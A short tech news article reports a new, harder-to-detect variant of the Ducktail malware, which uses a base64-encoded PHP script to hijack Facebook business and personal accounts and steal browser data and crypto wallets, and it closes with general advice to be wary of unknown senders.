A phishing script written in PHP targets Facebook users’ accounts. The malware is a variant of Ducktail malware. In addition to Facebook accounts, the script can access data stored in the browser and crypto wallets.
Ducktail malware was discovered a few months ago and mainly targets people and companies using business Facebook accounts. The program took over a year to develop and was distributed via email. The attackers use social engineering techniques and look for targets via the career network LinkedIn. The application is delivered in the form of an archive with images, videos, and documents. Once the file is downloaded and opened, browser cookies are read and sent to the hackers’ server.
A new version of the malware has now been discovered that is more difficult to detect by antivirus apps. According to Zscaler, a fake application containing a PHP interpreter and various script files is installed. To ensure that the components are actually running, the malware creates tasks in the task scheduler. The actual code used to steal Facebook accounts is a base64 encoded PHP script. The content is decoded directly in memory, so the code is not cached on disk and therefore not necessarily recognized.
Developers targeting personal accounts
In addition to business accounts, Ducktail should also target accounts of private users. If business accounts have been hijacked, an attempt is made to access payment method information. Due to the further development of Ducktail, it can be assumed that the hackers behind the malware will continue to work on the program to release new variants. As usual, it’s a good idea to be wary of messages from unknown senders and to closely inspect files before downloading them to avoid installing malware.
Digital marketing enthusiast and industry professional in Digital technologies, Technology News, Mobile phones, software, gadgets with vast experience in the tech industry, I have a keen interest in technology, News breaking.